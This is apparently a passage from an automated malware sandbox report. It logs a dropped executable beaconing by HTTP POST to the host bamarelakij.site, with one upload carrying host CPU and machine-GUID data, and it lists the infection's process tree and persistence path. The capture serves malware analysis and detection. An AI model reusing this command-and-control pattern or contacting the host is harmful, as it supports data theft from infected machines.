                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 8fdf02250c8c4237-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1806&rtt_var=685&sent=50&recv=112&lost=0&retrans=0&sent_bytes=2838&recv_bytes=105177&delivery_rate=1586956&cwnd=194&unsent_bytes=0&cid=0d22e92178a60d03&ts=898&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
18          192.168.2.4  49919        104.21.80.52    443               4176  C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-06 22:05:15 UTC  456                OUT        POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Accept: */*
                                                       User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                       fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                       Content-Length: 745
                                                       Host: bamarelakij.site
2025-01-06 22:05:15 UTC  831                IN         HTTP/1.1 204 No Content
                                                       Date: Mon, 06 Jan 2025 22:05:15 GMT
                                                       Connection: close
                                                       v: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                       cf-cache-status: DYNAMIC
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wAejjH3jVGyUVrA6RYR%2BmYJm%2F5yCrYKdkkA8%2Fl74xWB%2FimQCfX%2BDWAIzlc13IrlHY5pj8gJggEIQ6sKd6HkfNnKOmihh32rb2PGSvQuaf%2FRCEG8NZgzwWdMTbACdtwdMzm8R"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 8fdf022d1faf4394-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1582&rtt_var=604&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1837&delivery_rate=1796923&cwnd=168&unsent_bytes=0&cid=dc6c3262e65a69fe&ts=346&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
19          192.168.2.4  49929        104.21.80.52    443               4176  C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-06 22:05:16 UTC  456                OUT        POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Accept: */*
                                                       User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                       fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                       Content-Length: 212
                                                       Host: bamarelakij.site
2025-01-06 22:05:16 UTC  819                IN         HTTP/1.1 204 No Content
                                                       Date: Mon, 06 Jan 2025 22:05:16 GMT
                                                       Connection: close
                                                       v: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                       cf-cache-status: DYNAMIC
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bS5UtIfRQaDmk1DcjVCuZpp0YuUz00CQ48rvUL5IaoAAcFOjyP2h9r58tfTKeHNlS4szbg5e3tgyrDhYnlWBXVI6pNrkyfOW3p1qwA2kKLFd08QqnFxeaYwchcveqEcQh2Cz"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 8fdf02329aa5236a-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=2628&min_rtt=2628&rtt_var=1314&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4214&recv_bytes=1304&delivery_rate=153643&cwnd=170&unsent_bytes=0&cid=82efe8ca282aad03&ts=329&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
20          192.168.2.4  49938        104.21.80.52    443               4176  C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-06 22:05:17 UTC  456                OUT        POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Accept: */*
                                                       User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                       fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                       Content-Length: 380
                                                       Host: bamarelakij.site
2025-01-06 22:05:17 UTC  828                IN         HTTP/1.1 204 No Content
                                                       Date: Mon, 06 Jan 2025 22:05:17 GMT
                                                       Connection: close
                                                       v: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                       cf-cache-status: DYNAMIC
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=55eWPcJUjsbrOTbdYj3LPxXifWpOlf6f7Ubj1ZTUSkL3GdYm71%2BC9l7lz1mZQbGI0S3Fprm7pH%2FK2tj8t9HOn9uNOZ3jY%2F9jmLNs5zyJVNb9OCrUEnon%2BlZ7DmJTx48nyeqq"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 8fdf02382d0cc40c-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=5586&min_rtt=1815&rtt_var=3101&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1472&delivery_rate=1608815&cwnd=221&unsent_bytes=0&cid=99577d1e8536181c&ts=329&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49946 | 104.21.80.52 | 443 | 4176 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:05:18 UTC | 458 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
Content-Length: 58769
Host: bamarelakij.site
2025-01-06 22:05:18 UTC | 826 | IN | HTTP/1.1 204 No Content
Date: Mon, 06 Jan 2025 22:05:18 GMT
Connection: close
v: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BMGdiagpUqYCv2dcuyVAa8Y9USG1yLrxyOLHSyFqyahu1eHZPhQZpvb8xPMpwi35LVLjihWEMbMvv9B2WHfHsFlJlXhM33Kb6k5%2B0aLfqQyvM81zHX6BBbh6Wp0yIBa%2FrKCc"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fdf023d2ade443e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1672&min_rtt=1604&rtt_var=737&sent=24&recv=65&lost=0&retrans=0&sent_bytes=2838&recv_bytes=60017&delivery_rate=1358771&cwnd=195&unsent_bytes=0&cid=45cec2bb3519399d&ts=581&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49953 | 104.21.80.52 | 443 | 4176 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:05:19 UTC | 458 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
Content-Length: 69740
Host: bamarelakij.site
2025-01-06 22:05:19 UTC | 826 | IN | HTTP/1.1 204 No Content
Date: Mon, 06 Jan 2025 22:05:19 GMT
Connection: close
v: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zrUR1In0x9fqwPnhAXjXoPCY0kOk%2BWPy6hqBT9xXoyu1Xx3pOSXLUet8z17vMQApWjxlnVzhCyFvNzB9Os8LOeyW44j%2BDfrMQXUmguKhyxINHWxoo17Qfb3SuWHk79PdGy57"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fdf0244998bc43b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1652&rtt_var=645&sent=48&recv=77&lost=0&retrans=0&sent_bytes=2838&recv_bytes=71032&delivery_rate=1662870&cwnd=194&unsent_bytes=0&cid=87ca1a93db91951e&ts=635&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49954 | 104.21.80.52 | 443 | 5580 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:05:19 UTC | 352 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
Content-Length: 147
Host: bamarelakij.site
2025-01-06 22:05:19 UTC | 147 | OUT | Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 00 60 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 88 dc 82 cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzd$9e146be9-c76a-4720-bcdb-53011b87bd06
2025-01-06 22:05:19 UTC | 847 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 22:05:19 GMT
Transfer-Encoding: chunked
Connection: close
v: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ebbQMZj%2FzZx9wXsjwNwLDGEmMzJ5gnGmBCfUYL0D%2FpEtkqEyN%2FvFoJyoChQkk5zQR2Vum3OEc7yPDl7dY9gCSPBxTXJimejEtTRusKQqwQcZH0N%2BC6MU1L7lKoSJYdlKMHa"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fdf02459c01f795-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1634&rtt_var=633&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1135&delivery_rate=1701631&cwnd=187&unsent_bytes=0&cid=aeb1c83b84f369c4&ts=405&x=0"
                                                                                                                                                            Data Ascii: NfU$vYeQY6.49.886:7.49<5Q4YQqvErYeQY6:9]Y]6m4YjSnO`tYa7U;&WYeQY!::9848
                                                                                                                                                            2025-01-06 22:05:19 UTC1369INData Raw: 51 c9 59 bb b0 36 36 b2 3a b9 2e a2 36 b2 b1 3a 39 ba b6 04 00 55 0e 4a 0e 0f 00 e4 0e 16 11 02 e4 04 34 59 4a 0e 6d 48 cd 1f 9c 6d 02 2c 08 00 98 05 7c 05 13 00 ec 0e 16 11 02 ec 08 76 59 7c 05 65 9b b6 a7 b7 51 c9 59 38 39 b7 33 b4 36 b2 b9 08 00 1d 05 73 06 13 00 ec 0e 16 11 02 ec 08 9a 59 73 06 65 9b b6 a7 b7 51 c9 59 32 b2 3b b4 b1 b2 a4 32 08 00 01 07 7e 0a 13 00 eb 0e 16 11 02 eb 08 76 59 7e 0a 44 4e b0 2a 09 b2 fd 29 b5 d0 2f 4d 35 81 bb da 08 00 a3 05 96 0c 13 00 ec 0e 16 11 02 ec 08 76 59 96 0c 65 9b b6 a7 b7 51 c9 59 38 39 b7 33 b4 36 b2 b9 08 00 61 07 10 01 13 00 ec 0e 16 11 02 ec 08 7a 59 10 01 65 9b b6 a7 b7 51 c9 59 28 39 b7 33 b4 36 b2 b9 04 00 16 0d f4 02 0f 00 e4 0e 16 11 02 e4 04 72 59 f4 02 a2 40 03 57 53 65 cc 64 0a 00 0d 03 9c 0c 13
                                                                                                                                                            Data Ascii: QY66:.6:9UJ4YJmHm,|vY|eQY8936sYseQY2;2~vY~DN*)/M5vYeQY8936azYeQY(936rY@WSed
                                                                                                                                                            2025-01-06 22:05:19 UTC1369INData Raw: 2e a6 b4 b1 39 b7 b9 b7 33 3a 2e a2 32 b3 b2 2e a0 38 38 36 b4 b1 b0 3a b4 b7 37 2e b6 b9 b2 32 b3 b2 17 b2 3c b2 04 00 65 0f 15 05 0f 00 e4 0e 16 11 02 e4 04 76 59 15 05 0d 83 3d 7e fc a6 f2 4d 04 00 f0 0e 3a 08 0f 00 e4 0e 16 11 02 e4 04 ed 59 3a 08 b8 b0 eb e2 49 95 24 d1 04 00 c4 0b b0 0e 0f 00 e4 0e 16 11 02 e4 04 72 59 b0 0e 45 22 23 14 b5 e6 19 22 0b 00 3f 02 6f 09 13 00 ec 0e 16 11 02 ec 08 d8 59 6f 09 65 9b b6 a7 b7 51 c9 59 31 39 b7 bb b9 b2 39 17 b2 3c b2 04 00 bd 01 51 09 0f 00 e4 0e 16 11 02 e4 04 72 59 51 09 89 54 7b 8b 79 90 41 bd 20 00 b6 06 b9 05 13 00 ec 0e 16 11 02 ec 08 73 59 b9 05 65 9b b6 a7 b7 51 c9 59 32 b4 b9 b1 b7 39 32 38 3a 31 2e 26 b7 b1 b0 36 10 a9 3a b7 39 b0 b3 b2 2e 36 b2 3b b2 36 32 31 08 00 86 0e 4c 02 13 00 eb 0e 16 11
                                                                                                                                                            Data Ascii: .93:.2.886:7.2<evY=~M:Y:I$rYE"#"?oYoeQY199<QrYQT{yA sYeQY2928:1.&6:9.6;621L


Session ID:24
Source IP:192.168.2.4
Source Port:49960
Destination IP:104.21.80.52
Destination Port:443
PID:4176
Process:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp:2025-01-06 22:05:20 UTC
Bytes transferred:455
Direction:OUT
Data:
POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
Content-Length: 35
Host: bamarelakij.site

Timestamp:2025-01-06 22:05:20 UTC
Bytes transferred:35
Direction:OUT
Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff

Timestamp:2025-01-06 22:05:20 UTC
Bytes transferred:728
Direction:IN
Data:
HTTP/1.1 204 No Content
Date: Mon, 06 Jan 2025 22:05:20 GMT
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pDESY6bAzCi%2FHjc3mdOm2FozfQM3sUMS4JVXv2NHtIJf1ucO0dzt0lKKNtpelU3GOyNf9QvvgkEmh3%2BUP79m59rOluhdffUGCihM%2B5j9bjyRH7txY6xXwbmKX%2Fss4IbfepTr"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fdf024b79d842d3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1606&rtt_var=613&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1126&delivery_rate=1769696&cwnd=246&unsent_bytes=0&cid=65b631acdc809da4&ts=301&x=0"


Session ID:25
Source IP:192.168.2.4
Source Port:49966
Destination IP:104.21.80.52
Destination Port:443
PID:5580
Process:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp:2025-01-06 22:05:20 UTC
Bytes transferred:455
Direction:OUT
Data:
POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
Content-Length: 53
Host: bamarelakij.site

Timestamp:2025-01-06 22:05:20 UTC
Bytes transferred:53
Direction:OUT
Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 03 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff

Timestamp:2025-01-06 22:05:21 UTC
Bytes transferred:724
Direction:IN
Data:
HTTP/1.1 204 No Content
Date: Mon, 06 Jan 2025 22:05:20 GMT
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=saHFWZv913nhrbEviC65qo6ORSIYg7K5pg6QHHxzWszAJ0euOIPJE0FXVAYLLnxn%2F487GoJfFrbaOwZM4dHcVtOdCL44hANbHMlwVjZbOHgJEt4Jt7AGejyHfuGZybKwl4Y%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fdf024cdcc441c0-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1765&rtt_var=666&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1144&delivery_rate=1654390&cwnd=210&unsent_bytes=0&cid=b711eac5c73a7d6c&ts=340&x=0"



                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:17:03:58
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Users\user\Desktop\w3245.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\w3245.exe"
                                                                                                                                                            Imagebase:0x7c0000
                                                                                                                                                            File size:15'806'278 bytes
                                                                                                                                                            MD5 hash:E92B4D3EE13DA899EA0AD5B54A0094ED
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:1
                                                                                                                                                            Start time:17:03:58
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe" -burn.clean.room="C:\Users\user\Desktop\w3245.exe" -burn.filehandle.attached=540 -burn.filehandle.self=528
                                                                                                                                                            Imagebase:0xa00000
                                                                                                                                                            File size:15'692'672 bytes
                                                                                                                                                            MD5 hash:EC4072E1AE2A9316270E6AFD66235A97
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:17:04:00
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
                                                                                                                                                            Imagebase:0xa90000
                                                                                                                                                            File size:6'487'736 bytes
                                                                                                                                                            MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 3%, ReversingLabs
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:3
                                                                                                                                                            Start time:17:04:02
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
                                                                                                                                                            Imagebase:0x600000
                                                                                                                                                            File size:6'487'736 bytes
                                                                                                                                                            MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 3%, ReversingLabs
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:4
                                                                                                                                                            Start time:17:04:03
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:5
Start time:17:04:03
Start date:06/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:17:04:29
Start date:06/01/2025
Path:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Imagebase:0x7ff72bec0000
File size:2'364'728 bytes
MD5 hash:967F4470627F823F4D7981E511C9824F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:moderate
Has exited:true

Target ID:11
Start time:17:04:39
Start date:06/01/2025
Path:C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe"
Imagebase:0x600000
File size:6'487'736 bytes
MD5 hash:11C8962675B6D535C018A63BE0821E4C
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:12
Start time:17:04:40
Start date:06/01/2025
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\cmd.exe
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:17:04:40
Start date:06/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:14
Start time:17:04:56
Start date:06/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Imagebase:0x7ff67dcd0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:15
Start time:17:04:57
Start date:06/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:0x7ff67dcd0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:16
Start time:17:04:57
Start date:06/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1984,i,12396277131636632407,2205267590406277603,262144 /prefetch:3
Imagebase:0x7ff67dcd0000
File size:4'210'216 bytes
